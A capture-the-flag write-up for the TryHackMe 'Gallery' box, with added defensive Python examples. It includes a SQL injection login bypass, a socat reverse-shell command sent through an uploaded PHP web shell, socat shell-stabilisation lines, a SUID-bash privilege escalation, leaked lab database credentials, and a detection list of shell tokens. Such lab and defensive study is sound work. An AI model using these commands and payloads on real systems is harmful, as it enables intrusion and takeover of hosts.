# Writeup [Gallery](https://tryhackme.com/room/gallery666)
###### Nmap
```
──(###########)-[~/THM/gallery]
└─$ nmap -sV -Pn -A 10.10.112.224 | tee port_test
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-02 13:33 EDT
Nmap scan report for 10.10.112.224
Host is up (0.44s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Simple Image Gallery System
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.54 seconds
```
>So there are ***2 ports*** open.
>Let's check both of them. On port `80` there is the default home page, but on port `8080` there is a login page titled **[Simple Image Gallery](https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiQ0eqfktz4AhUU-DgGHdHNAocQFnoECBsQAQ&url=https%3A%2F%2Fwww.exploit-db.com%2Fexploits%2F50214&usg=AOvVaw0tFldoZswx1jVjvHlJheau)**
>On searching for it we find out it is a CMS.
So our answer for the 2nd question is `Simple Image Gallery`
>So we have a login page but no credentials; let's try a simple SQL injection on it.
>Username = `' OR 1=1 -- -`
Password = `""`
Guess what, we get logged in!! :)
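The bypass above works because the login query is assembled from the submitted strings. The following is an added example, not the CMS's own code (the writeup never shows its PHP query): a string-built login next to the parameterised form, on a constructed SQLite table, so the same `' OR 1=1 -- -` username can be tried against both.

```python
"""Login query built by string concatenation versus a parameterised query.

Added example, not the Simple Image Gallery System's own code: the CMS is
PHP and its real query is not shown in the writeup. The users table and
its single account are constructed here so the script runs offline.
"""
import sqlite3


def build_db():
    """In-memory users table with one constructed account.

    The password is stored in clear only to keep the demo about the query;
    a real application stores and verifies a password hash.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        ("admin", "correct-horse"),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Interpolates user input straight into the SQL text.

    With username  ' OR 1=1 -- -  the WHERE clause becomes
        WHERE username = '' OR 1=1 -- -' AND password = ''
    so the password check is commented out and the first row matches.
    """
    sql = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, username, password):
    """Same query with bound parameters: the input is data, never SQL."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


BYPASS_USERNAME = "' OR 1=1 -- -"  # the exact username used in the writeup


if __name__ == "__main__":
    db = build_db()
    print("vulnerable login, bypass payload:", login_vulnerable(db, BYPASS_USERNAME, ""))
    print("fixed login, bypass payload:     ", login_fixed(db, BYPASS_USERNAME, ""))
    print("fixed login, real credentials:   ", login_fixed(db, "admin", "correct-horse"))
```

The fix is purely in how the query is sent: bound parameters are passed to the driver separately from the statement text, so the quote and the `--` comment in the username never reach the SQL parser as syntax.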
> Let's search for an exploit for Simple Image Gallery System.
By running `searchsploit Simple Image Gallery`:
```
searchsploit Simple Image Gallery
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities | php/webapps/49064.txt
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site Scripting | php/webapps/44104.txt
Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated) | php/webapps/50214.py
Simple Image Gallery System 1.0 - 'id' SQL Injection | php/webapps/50198.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
```
>Let's try to run exploit `50214.py` for remote code execution; after setting the target to the machine `<ip>` and running it, we get:

>So here we get a link for remote code execution.

Now let's get a reverse shell through it. To do this we URL-encode the command:
```
http://10.10.159.190/gallery/uploads/1656838200_TagokjrjzbyzsykmavtLetta.php?cmd=socat%20tcp-connect:<sys-ip>:1234%20exec:/bin/sh,pty,stderr,setsid,sigint,sane
```
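From the defender's side, the request above is exactly what the web server's access log records, and it is easy to flag: a `.php` file served from an upload directory with a shell command in its query string. The following is an added detection example, not from the writeup or the CMS: a small Apache access-log scanner run over constructed log lines (the PHP path and the socat command are the ones from the writeup, with the listener address standing in for `<sys-ip>`).

```python
"""Flag web-shell style requests in Apache access logs.

Added detection example, not part of the writeup or the CMS. The log
lines below are constructed; the PHP path and the socat command are the
ones the writeup used, with the listener address standing in for <sys-ip>.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format up to the status code; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# Query-string keys web shells commonly read their command from.
COMMAND_KEYS = {"cmd", "exec", "command", "c"}
# Substrings that only make sense inside a shell command line.
SHELL_TOKENS = ("socat", "/bin/sh", "/bin/bash", "bash -i", "tcp-connect:", "exec:", " nc ")


def analyse_request(line):
    """Return a list of reasons this request looks like web-shell use, or []."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m["target"])
    reasons = []
    # PHP executed from an upload directory: uploads should only ever be static files.
    if "/uploads/" in parts.path and parts.path.lower().endswith(".php"):
        reasons.append("php script requested under /uploads/")
    # parse_qs percent-decodes values, so %20 becomes a space before matching.
    for key, values in parse_qs(parts.query).items():
        for value in values:
            if key.lower() in COMMAND_KEYS:
                reasons.append(f"command-style parameter {key}={value!r}")
            elif any(tok in value for tok in SHELL_TOKENS):
                reasons.append(f"shell tokens in parameter {key}={value!r}")
    return reasons


def scan_log(text):
    """Return (client ip, path, reasons) for every suspicious line in the log text."""
    hits = []
    for line in text.splitlines():
        reasons = analyse_request(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m["ip"], urlsplit(m["target"]).path, reasons))
    return hits


# Constructed sample: two benign requests and the writeup's reverse-shell request.
SAMPLE_LOG = """\
10.6.35.22 - - [03/Jul/2022:09:10:11 +0000] "GET /gallery/?page=images HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.6.35.22 - - [03/Jul/2022:09:10:12 +0000] "GET /gallery/uploads/1656838200_photo.jpg HTTP/1.1" 200 81920 "-" "Mozilla/5.0"
10.6.35.22 - - [03/Jul/2022:09:10:40 +0000] "GET /gallery/uploads/1656838200_TagokjrjzbyzsykmavtLetta.php?cmd=socat%20tcp-connect:10.6.35.22:1234%20exec:/bin/sh,pty,stderr,setsid,sigint,sane HTTP/1.1" 200 0 "-" "curl/7.81.0"
"""

if __name__ == "__main__":
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(ip, path)
        for reason in reasons:
            print("   -", reason)
```

The two checks are independent on purpose: the path rule catches any PHP executed from `uploads/` even when the command is hidden in a POST body, and the query rule catches command-style parameters wherever the script lives. The underlying mitigation is to stop Apache executing PHP under the upload directory at all (for example `php_admin_flag engine off` in a `<Directory>` block for it), after which the upload from the exploit is just a file download.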
>After getting a shell, let's stabilise it with socat.
On your own system, listen with:
```
socat file:`tty`,raw,echo=0 tcp-listen:4444
```
and run the following in the shell:
```
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.6.35.22:4444
```
So we get a stabilised shell.
>Let's enumerate and get the user flag.
On searching we don't find any data in the current directory, so we have to check every directory and each file in it.
On searching we find a user named `mike`.
>We therefore find a backup of part of mike's home; we can read everything in it, even the `.bash_history`.
Let's check `.bash_history`; this reveals something useful.

>So we get the password for mike.
So let's switch to mike.


### Becoming Root
After running `sudo -l` we find that `/opt/rootkit.sh` can be run with sudo.

Let's check what's in `rootkit.sh`:

As `rootkit.sh` runs as root, and its `read` command lets us choose an option that opens `nano`, we can escalate privileges from there and become root.
On doing so it shows `Error opening terminal: unknown.`, which means we have to tell it which terminal type to use.
Use the command `export TERM=xterm` to do so, then run it again.

We get this shell; now press `^R ^X` to execute a command from inside nano.
As we can execute any command, let's set the SUID bit on `/bin/bash` with `chmod a+s /bin/bash`.
After exiting nano, run `/bin/bash -p` and we become root!!! :)
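The `chmod a+s /bin/bash` step leaves a persistent artefact on disk that is easy to audit for. The following is an added example, not from the writeup: a set-id file audit that walks a tree, reports setuid/setgid regular files and diffs them against a baseline allowlist. The baseline here is an illustrative assumption, not a verified list for the box, and the demo tree it walks is constructed in a temporary directory.

```python
"""Audit a filesystem tree for setuid/setgid files that are not on a baseline.

Added example, not from the writeup. The baseline below is an illustrative
allowlist (assumption), not a verified list for the Gallery box; a real
audit records the set-id files of a known-good image and compares to that.
"""
import os
import stat
import tempfile

# Illustrative baseline of binaries normally setuid on an Ubuntu host (assumption).
BASELINE_SETID = {
    "/usr/bin/sudo",
    "/usr/bin/passwd",
    "/usr/bin/su",
    "/usr/bin/chsh",
    "/usr/bin/newgrp",
}


def setid_files(root):
    """Return sorted [(path, 'suid' | 'sgid' | 'suid+sgid'), ...] for regular files under root."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink's own mode, never its target's
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = []
            if st.st_mode & stat.S_ISUID:
                bits.append("suid")
            if st.st_mode & stat.S_ISGID:
                bits.append("sgid")
            if bits:
                found.append((path, "+".join(bits)))
    return sorted(found)


def unexpected_setid(root, baseline=BASELINE_SETID):
    """Set-id files under root that the baseline does not account for.

    chmod a+s sets both bits, so a bash copy treated that way reports 'suid+sgid'.
    """
    return [(path, bits) for path, bits in setid_files(root) if path not in baseline]


def make_demo_tree():
    """Constructed demo tree: one plain file and one file with both set-id bits.

    Returns (root, path_of_setid_file). Mirrors the writeup's chmod a+s on a 755 file.
    """
    root = tempfile.mkdtemp(prefix="setid-audit-")
    plain = os.path.join(root, "plain")
    open(plain, "w").close()
    os.chmod(plain, 0o755)
    bad = os.path.join(root, "bash_copy")
    open(bad, "w").close()
    os.chmod(bad, 0o6755)  # rwsr-sr-x, what `chmod a+s` produces on a 755 file
    return root, bad


if __name__ == "__main__":
    demo_root, _ = make_demo_tree()
    for path, bits in unexpected_setid(demo_root):
        print(f"{bits:9} {path}")
```

Run against `/usr/bin` or `/bin` on a real host with a baseline captured from a clean image, the same function reports the modified `/bin/bash` as `suid+sgid`. Because it uses `lstat` and only counts regular files, a symlink planted next to a legitimate set-id binary does not hide or spoof a result.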

>Now just read `root.txt`.

Now the only thing remaining is getting the hashes of the admin user.
Exit the root shell and mike, and come back to our www-data shell to find the admin hashes.
In the `gallery` directory we find `initialize.php`, in which the database username and password are given.

So we get the database username `gallery_user` and the password `passw0rd321`.
Let's get into the database:



>Here we get the hashes.
Hence the box is done! :):)